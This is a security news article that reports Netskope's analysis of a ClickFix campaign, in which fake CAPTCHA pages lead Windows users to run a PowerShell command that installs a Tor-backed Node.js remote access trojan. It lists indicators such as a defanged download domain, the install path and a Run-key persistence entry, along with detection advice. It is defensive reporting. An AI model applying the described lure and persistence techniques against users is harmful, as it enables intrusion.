ClickFix attack drops Node.js Windows RAT that hides behind Tor and in-memory payloads
4 min. read 
Published on
A new ClickFix campaign is targeting Windows users with a fake browser verification page that tricks them into running a hidden PowerShell command. Netskope Threat Labs said the command downloads a malicious MSI installer named NodeServer-Setup-Full.msi, which then deploys a modular Node.js-based remote access trojan on the victim machine.
The malware stands out because it keeps much of its real functionality off disk. Netskope said the core modules arrive only after the malware connects to its command server, where they run in memory as JavaScript strings. That design lowers the forensic footprint and makes static detection harder.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
The operators also route command and control traffic through the Tor network using gRPC streaming. That gives them a persistent two-way channel while masking the backend infrastructure, which makes takedowns and attribution more difficult.
How the ClickFix chain works
The attack begins with a fake CAPTCHA or verification page. Netskope said the lure places a Base64-encoded PowerShell command on the clipboard or prompts the user to run it, a familiar pattern in ClickFix campaigns that rely on social engineering instead of exploiting a software vulnerability.
That command downloads NodeServer-Setup-Full.msi from cloud-verificate[.]com and installs it silently. Netskope said the files land in %LOCALAPPDATA%\LogicOptimizer\, where the malware creates a LogicOptimizer entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run so it launches at logon.
To stay quiet, the installer uses conhost.exe in headless mode to launch the bundled Node.js runtime. The malware then decrypts its configuration through layered routines, including AES-256-CBC and XOR, before revealing its Tor hidden service destination.
Why this campaign is more dangerous than a basic loader
Netskope said the RAT uses a modular framework where new capabilities arrive only after the system checks in with the command server. That means analysts may not find the most dangerous pieces on disk, because the operators can push them later and execute them directly in memory.
Researchers also found an exposed admin panel due to an operational security mistake by the attackers. According to Netskope, that panel revealed a malware-as-a-service backend with support for multiple operators, role-based access control, custom module delivery, wallet tracking, and Telegram alerts for new victim activity.
The malware also profiles each infected machine before the operators decide what to do next. Netskope said it collects operating system details, hardware information, geographic location, external IP data, and a list of installed security products, including Windows Defender, CrowdStrike, Kaspersky, and SentinelOne.
Key details at a glance
| Item | Confirmed detail |
|---|---|
| Delivery method | ClickFix fake verification or CAPTCHA lure |
| Installer name | NodeServer-Setup-Full.msi |
| Install path | %LOCALAPPDATA%\LogicOptimizer\ |
| Persistence | HKCU\Software\Microsoft\Windows\CurrentVersion\Run |
| Runtime | Bundled Node.js launched through conhost.exe |
| C2 method | gRPC over Tor |
| Execution model | Dynamic modules delivered and executed in memory |
| Extra finding | Exposed MaaS admin panel |
What defenders should watch for
- Unexpected PowerShell activity followed by silent MSI downloads.
- New
LogicOptimizerentries in the Windows Run key. - Suspicious
conhost.exeor Node.js processes on systems that should not run Node locally. - Tor-related outbound traffic and unusual SOCKS5 proxy behavior.
- Endpoint telemetry showing in-memory JavaScript execution after a new C2 connection.
- Users pasting and launching commands from fake verification pages.
What organizations should do now
Security teams should review Windows endpoints for PowerShell-driven MSI installs, Tor downloads, unexpected Node.js runtimes, and new autorun entries tied to LogicOptimizer. Netskope said defenders should also monitor for unusual outbound traffic and treat this campaign as a full remote access threat, not just a simple dropper.
Training still matters because ClickFix depends on the victim running the command. Microsoft’s February write-up on another ClickFix variant made the same point: these campaigns work because users trust the on-screen instructions and execute commands they did not generate themselves.
The broader lesson is clear. Threat actors no longer need a noisy exploit chain to land a sophisticated RAT on Windows. A fake browser check, a copied command, and a silent installer can be enough to open a Tor-backed remote access channel that stays hard to spot and hard to disrupt.
FAQ
ClickFix is a social engineering technique that uses fake verification or CAPTCHA pages to convince users to run malicious commands on their own machines. Netskope and Microsoft both describe it as a growing delivery method for modern malware campaigns.
The malware uses Node.js, loads key modules only after it reaches the command server, and executes those modules in memory. It also hides its command traffic behind Tor and gRPC.
Netskope said it creates a LogicOptimizer value under the current user Run key so it launches each time the user signs in.
Look for PowerShell-triggered MSI installs, unexpected Node.js execution, suspicious conhost.exe behavior, Tor downloads, and new autorun registry entries tied to LogicOptimizer.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages